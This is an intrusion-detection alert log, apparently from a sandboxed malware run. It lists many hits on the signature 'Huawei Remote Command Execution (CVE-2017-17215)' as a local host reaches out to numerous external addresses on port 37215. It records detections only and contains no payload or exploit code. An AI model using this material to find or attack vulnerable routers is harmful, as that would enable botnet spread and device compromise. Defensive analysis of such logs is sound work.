                                                        06/13/24-21:33:13.229080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173837215192.168.2.14156.220.174.96
                                                        06/13/24-21:31:57.093382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095437215192.168.2.14197.137.16.96
                                                        06/13/24-21:32:30.076874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4783237215192.168.2.14197.191.131.120
                                                        06/13/24-21:33:00.887691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5226437215192.168.2.14197.29.116.24
                                                        06/13/24-21:33:11.179058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5539237215192.168.2.14197.255.71.111
                                                        06/13/24-21:32:48.555515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773637215192.168.2.14197.168.107.255
                                                        06/13/24-21:32:34.213772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4815837215192.168.2.1441.245.224.173
                                                        06/13/24-21:33:13.212974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830837215192.168.2.1441.12.134.29
                                                        06/13/24-21:32:03.279278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545237215192.168.2.14156.71.135.100
                                                        06/13/24-21:31:59.196283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238037215192.168.2.14156.70.115.159
                                                        06/13/24-21:32:07.400626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3876037215192.168.2.14197.2.249.56
                                                        06/13/24-21:33:02.912335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440437215192.168.2.14197.171.30.238
                                                        06/13/24-21:32:38.300693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306237215192.168.2.14156.46.147.201
                                                        06/13/24-21:33:17.306814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388637215192.168.2.14156.148.232.54
                                                        06/13/24-21:32:52.680841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855437215192.168.2.1441.231.45.116
                                                        06/13/24-21:32:17.677542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055837215192.168.2.1441.10.234.38
                                                        06/13/24-21:33:11.175246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690037215192.168.2.14197.179.28.126
                                                        06/13/24-21:32:25.991693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5657237215192.168.2.14197.110.32.141
                                                        06/13/24-21:32:13.545570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202437215192.168.2.14156.188.234.112
                                                        06/13/24-21:32:34.217933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963037215192.168.2.14197.1.8.174
                                                        06/13/24-21:33:09.088362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422037215192.168.2.14156.10.87.242
                                                        06/13/24-21:32:46.509209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232437215192.168.2.14156.179.218.208
                                                        06/13/24-21:32:32.150294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5690237215192.168.2.14156.60.22.150
                                                        06/13/24-21:32:52.677710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5535637215192.168.2.14156.93.244.100
                                                        06/13/24-21:31:57.092806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6057637215192.168.2.14197.151.100.125
                                                        06/13/24-21:32:25.995113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3991637215192.168.2.14197.73.165.123
                                                        06/13/24-21:32:50.610052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397637215192.168.2.14197.239.24.170
                                                        06/13/24-21:33:09.088728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295237215192.168.2.14156.177.136.154
                                                        06/13/24-21:32:17.695323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4185437215192.168.2.1441.69.171.64
                                                        06/13/24-21:32:48.550291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919437215192.168.2.14156.252.212.205
                                                        06/13/24-21:32:17.694908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4303437215192.168.2.1441.189.109.214
                                                        06/13/24-21:32:38.317886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5674837215192.168.2.14197.110.53.34
                                                        06/13/24-21:31:59.175204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940637215192.168.2.14156.113.81.8
                                                        06/13/24-21:32:09.438234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487237215192.168.2.1441.64.178.141
                                                        06/13/24-21:32:38.300861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671237215192.168.2.14156.89.152.44
                                                        06/13/24-21:32:11.488142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4817237215192.168.2.14197.76.49.85
                                                        06/13/24-21:33:07.041529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6094437215192.168.2.1441.77.84.81
                                                        06/13/24-21:32:03.278013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4521237215192.168.2.14156.98.126.146
                                                        06/13/24-21:32:30.096157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4902637215192.168.2.14197.250.202.222
                                                        06/13/24-21:32:38.315992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180837215192.168.2.14197.186.184.88
                                                        06/13/24-21:32:36.265273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041637215192.168.2.14197.12.145.28
                                                        06/13/24-21:32:30.095060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581837215192.168.2.14197.5.228.177
                                                        06/13/24-21:32:25.970190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894237215192.168.2.14197.253.93.162
                                                        06/13/24-21:33:15.257561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672037215192.168.2.1441.179.76.246
                                                        06/13/24-21:31:57.154325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276037215192.168.2.14197.182.139.161
                                                        06/13/24-21:31:57.136334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439237215192.168.2.14197.246.165.36
                                                        06/13/24-21:32:50.629534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227437215192.168.2.14156.30.68.234
                                                        06/13/24-21:32:03.308656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452637215192.168.2.1441.37.157.17
                                                        06/13/24-21:32:25.992833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806637215192.168.2.1441.26.197.170
                                                        06/13/24-21:32:48.569334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595637215192.168.2.1441.0.220.175
                                                        06/13/24-21:32:50.617918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123437215192.168.2.14156.176.255.121
                                                        06/13/24-21:32:23.945880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5470637215192.168.2.1441.16.74.47
                                                        06/13/24-21:33:17.306147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680237215192.168.2.14197.89.175.129
                                                        06/13/24-21:32:07.404263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856437215192.168.2.1441.28.205.6
                                                        06/13/24-21:32:25.992682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5419637215192.168.2.1441.101.111.49
                                                        06/13/24-21:32:09.439973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5548037215192.168.2.1441.52.145.116
                                                        06/13/24-21:32:34.218047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200237215192.168.2.1441.64.132.245
                                                        06/13/24-21:32:17.702601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388437215192.168.2.14197.118.211.71
                                                        06/13/24-21:32:58.821928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335037215192.168.2.1441.103.195.64
                                                        06/13/24-21:32:32.150455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4890637215192.168.2.1441.228.141.166
                                                        06/13/24-21:32:56.784506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689837215192.168.2.14197.91.7.203
                                                        06/13/24-21:32:50.611791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5280437215192.168.2.1441.129.45.97
                                                        06/13/24-21:32:23.831677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728237215192.168.2.1441.250.124.47
                                                        06/13/24-21:32:30.125150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313637215192.168.2.14197.71.211.23
                                                        06/13/24-21:31:59.177091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071237215192.168.2.14156.137.82.107
                                                        06/13/24-21:32:23.941905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617237215192.168.2.14197.94.58.122
                                                        06/13/24-21:32:42.407164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3742837215192.168.2.14156.33.69.51
                                                        06/13/24-21:32:07.403958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3900437215192.168.2.1441.137.66.158
                                                        06/13/24-21:31:57.153986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282037215192.168.2.14156.18.127.190
                                                        06/13/24-21:32:34.194914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083637215192.168.2.14156.253.253.67
                                                        06/13/24-21:32:52.670765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183237215192.168.2.14197.59.18.6
                                                        06/13/24-21:32:19.730502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5532037215192.168.2.14197.118.53.135
                                                        06/13/24-21:32:03.307323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5072437215192.168.2.1441.46.35.167
                                                        06/13/24-21:32:11.488405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5458037215192.168.2.1441.151.217.121
                                                        06/13/24-21:32:05.348641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174637215192.168.2.1441.181.237.0
                                                        06/13/24-21:32:30.079505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833037215192.168.2.14156.6.83.49
                                                        06/13/24-21:33:09.086916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4606437215192.168.2.14197.38.59.246
                                                        06/13/24-21:33:04.991905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4550037215192.168.2.1441.152.81.144
                                                        06/13/24-21:32:07.403339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5784837215192.168.2.14197.208.97.205
                                                        06/13/24-21:32:17.671463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4305437215192.168.2.14197.6.129.247
                                                        06/13/24-21:33:11.176784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3881637215192.168.2.14156.224.55.80
                                                        06/13/24-21:32:15.633429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139637215192.168.2.14156.14.181.247
                                                        06/13/24-21:32:30.115781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484637215192.168.2.14156.245.58.96
                                                        06/13/24-21:32:07.416576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100037215192.168.2.14197.213.42.81
                                                        06/13/24-21:33:02.950212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083637215192.168.2.1441.216.148.65
                                                        06/13/24-21:32:52.656981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279837215192.168.2.14197.24.189.47
                                                        06/13/24-21:33:11.154212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4962637215192.168.2.14156.6.4.79
                                                        06/13/24-21:32:46.508625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768837215192.168.2.14197.0.254.224
                                                        06/13/24-21:32:23.834084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021437215192.168.2.14197.85.238.174
                                                        06/13/24-21:32:40.379560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249437215192.168.2.14156.224.161.138
                                                        06/13/24-21:33:04.987953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140437215192.168.2.14156.183.181.112
                                                        06/13/24-21:32:28.048789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241037215192.168.2.14197.254.244.133
                                                        06/13/24-21:32:28.025922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033637215192.168.2.1441.36.168.187
                                                        06/13/24-21:32:36.248294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650437215192.168.2.14197.28.4.101
                                                        06/13/24-21:31:57.090897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5567037215192.168.2.14197.235.8.186
                                                        06/13/24-21:32:34.215717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839837215192.168.2.14156.172.200.110
                                                        06/13/24-21:32:01.237807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079837215192.168.2.1441.206.170.161
                                                        06/13/24-21:32:38.301487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4508037215192.168.2.14156.168.101.118
                                                        06/13/24-21:32:03.274719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998237215192.168.2.14156.81.45.147
                                                        06/13/24-21:32:54.727152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5303437215192.168.2.14197.63.47.215
                                                        06/13/24-21:32:21.784884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722037215192.168.2.1441.20.137.124
                                                        06/13/24-21:32:09.437480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587837215192.168.2.14156.119.147.98
                                                        06/13/24-21:32:58.821963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4871837215192.168.2.14156.110.215.179
                                                        06/13/24-21:32:46.509183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319437215192.168.2.14156.84.33.126
                                                        06/13/24-21:32:52.679292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602437215192.168.2.1441.167.81.69
                                                        06/13/24-21:32:11.484815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6035837215192.168.2.14197.97.30.46
                                                        06/13/24-21:32:25.978966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5607237215192.168.2.1441.177.62.49
                                                        06/13/24-21:32:48.569132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3907637215192.168.2.14156.59.29.176
                                                        06/13/24-21:32:46.503823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3882637215192.168.2.14156.97.147.136
                                                        06/13/24-21:32:05.377084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3467837215192.168.2.14156.183.19.75
                                                        06/13/24-21:32:05.370747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060437215192.168.2.14197.53.253.35
                                                        06/13/24-21:32:25.996053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4074437215192.168.2.14156.252.192.220
                                                        06/13/24-21:32:36.243477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335837215192.168.2.1441.75.15.210
                                                        06/13/24-21:32:34.195203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142237215192.168.2.1441.140.108.18
                                                        06/13/24-21:33:11.156245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014437215192.168.2.14156.79.227.152
                                                        06/13/24-21:32:11.487735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600637215192.168.2.14156.75.167.61
                                                        06/13/24-21:32:34.215112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999637215192.168.2.1441.95.75.216
                                                        06/13/24-21:31:57.093441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814837215192.168.2.1441.252.252.230
                                                        06/13/24-21:33:00.872240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130237215192.168.2.1441.200.57.244
                                                        06/13/24-21:32:36.247776TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595837215192.168.2.14197.246.139.66
                                                        06/13/24-21:32:11.487083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5472437215192.168.2.14156.134.85.150
                                                        06/13/24-21:32:21.787469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912637215192.168.2.1441.117.9.105
                                                        06/13/24-21:32:36.247330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4672837215192.168.2.14156.213.96.172
                                                        06/13/24-21:32:03.310251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826437215192.168.2.14197.203.105.230
                                                        06/13/24-21:32:48.568215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4857237215192.168.2.14197.195.118.174
                                                        06/13/24-21:32:44.476752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5723037215192.168.2.14156.168.242.62
                                                        06/13/24-21:33:15.256678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399637215192.168.2.14197.32.112.222
                                                        06/13/24-21:32:07.417810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4950037215192.168.2.14197.86.156.195
                                                        06/13/24-21:32:56.782699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930637215192.168.2.14156.59.255.28
                                                        06/13/24-21:33:04.988584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947637215192.168.2.14197.241.99.113
                                                        06/13/24-21:32:38.317468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658237215192.168.2.14156.253.122.243
                                                        06/13/24-21:32:50.612794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4902237215192.168.2.14197.215.58.142
                                                        06/13/24-21:32:34.216225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521237215192.168.2.14197.173.176.21
                                                        06/13/24-21:32:48.568251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475437215192.168.2.14156.168.23.194
                                                        06/13/24-21:33:05.013277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4952637215192.168.2.14197.152.197.117
                                                        06/13/24-21:32:58.822931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310237215192.168.2.1441.220.211.46
                                                        06/13/24-21:32:34.191303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6072437215192.168.2.14197.5.114.194
                                                        06/13/24-21:32:15.635144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824237215192.168.2.14156.54.48.243
                                                        06/13/24-21:33:11.156304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314637215192.168.2.14197.176.61.4
                                                        06/13/24-21:32:56.755432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5199237215192.168.2.14197.93.25.112
                                                        06/13/24-21:33:17.305587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469037215192.168.2.14156.34.84.222
                                                        06/13/24-21:33:04.988772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597237215192.168.2.1441.167.40.22
                                                        06/13/24-21:32:46.508720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3825837215192.168.2.14156.15.235.60
                                                        06/13/24-21:32:56.755630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743237215192.168.2.1441.32.51.119
                                                        06/13/24-21:33:15.272132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4967637215192.168.2.14197.48.183.216
                                                        06/13/24-21:32:01.239008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666437215192.168.2.14156.181.3.63
                                                        06/13/24-21:32:30.076709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775637215192.168.2.14197.33.20.96
                                                        06/13/24-21:32:38.317636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663437215192.168.2.1441.105.188.140
                                                        06/13/24-21:32:32.156564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3367037215192.168.2.1441.27.160.2
                                                        06/13/24-21:32:28.043409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669037215192.168.2.1441.81.41.86
                                                        06/13/24-21:32:36.242973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934037215192.168.2.1441.175.45.217
                                                        06/13/24-21:32:32.168160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398837215192.168.2.14197.30.98.49
                                                        06/13/24-21:32:54.709831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4279437215192.168.2.1441.232.44.35
                                                        06/13/24-21:32:56.753412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3746837215192.168.2.1441.194.61.137
                                                        06/13/24-21:32:11.485850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795037215192.168.2.1441.43.35.0
                                                        06/13/24-21:33:02.913960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3656437215192.168.2.14156.35.59.186
                                                        06/13/24-21:32:32.153214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4804237215192.168.2.14156.141.33.135
                                                        06/13/24-21:32:19.729967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4002437215192.168.2.14156.71.201.215
                                                        06/13/24-21:32:38.301220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359437215192.168.2.14197.82.148.185
                                                        06/13/24-21:32:05.377580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4762837215192.168.2.14156.160.173.116
                                                        06/13/24-21:32:25.994381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512437215192.168.2.14156.11.166.155
                                                        06/13/24-21:32:56.755217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448637215192.168.2.1441.54.48.158
                                                        06/13/24-21:32:52.669813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4604237215192.168.2.14156.231.177.165
                                                        06/13/24-21:32:42.423925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3968037215192.168.2.14156.3.63.32
                                                        06/13/24-21:32:42.418711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523037215192.168.2.14156.108.85.1
                                                        06/13/24-21:33:00.885352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3742437215192.168.2.14197.170.136.254
                                                        06/13/24-21:32:48.572321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858837215192.168.2.14156.66.52.131
                                                        06/13/24-21:32:42.420592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641437215192.168.2.14156.120.222.235
                                                        06/13/24-21:33:05.016642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3760837215192.168.2.14156.176.247.139
                                                        06/13/24-21:32:03.274005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867637215192.168.2.1441.11.229.119
                                                        06/13/24-21:32:44.453647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4713837215192.168.2.14156.188.121.57
                                                        06/13/24-21:31:57.093591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171037215192.168.2.14156.125.129.63
                                                        06/13/24-21:32:11.505526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422837215192.168.2.14156.225.255.132
                                                        06/13/24-21:32:19.731369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920437215192.168.2.14197.235.10.66
                                                        06/13/24-21:32:23.834441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3938237215192.168.2.1441.9.53.28
                                                        06/13/24-21:32:50.629808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243237215192.168.2.14197.32.27.251
                                                        06/13/24-21:33:00.868268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267237215192.168.2.14197.235.150.68
                                                        06/13/24-21:32:07.400751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4198437215192.168.2.14156.239.199.188
                                                        06/13/24-21:32:32.150789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867837215192.168.2.14156.121.136.180
                                                        06/13/24-21:32:38.298661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946437215192.168.2.14156.29.115.231
                                                        06/13/24-21:31:59.195012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769437215192.168.2.14197.15.134.113
                                                        06/13/24-21:32:36.244178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068237215192.168.2.14156.186.210.147
                                                        06/13/24-21:33:17.340375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379437215192.168.2.1441.149.241.15
                                                        06/13/24-21:32:25.973300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684437215192.168.2.14197.207.185.118
                                                        06/13/24-21:32:05.344643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5982837215192.168.2.1441.157.127.83
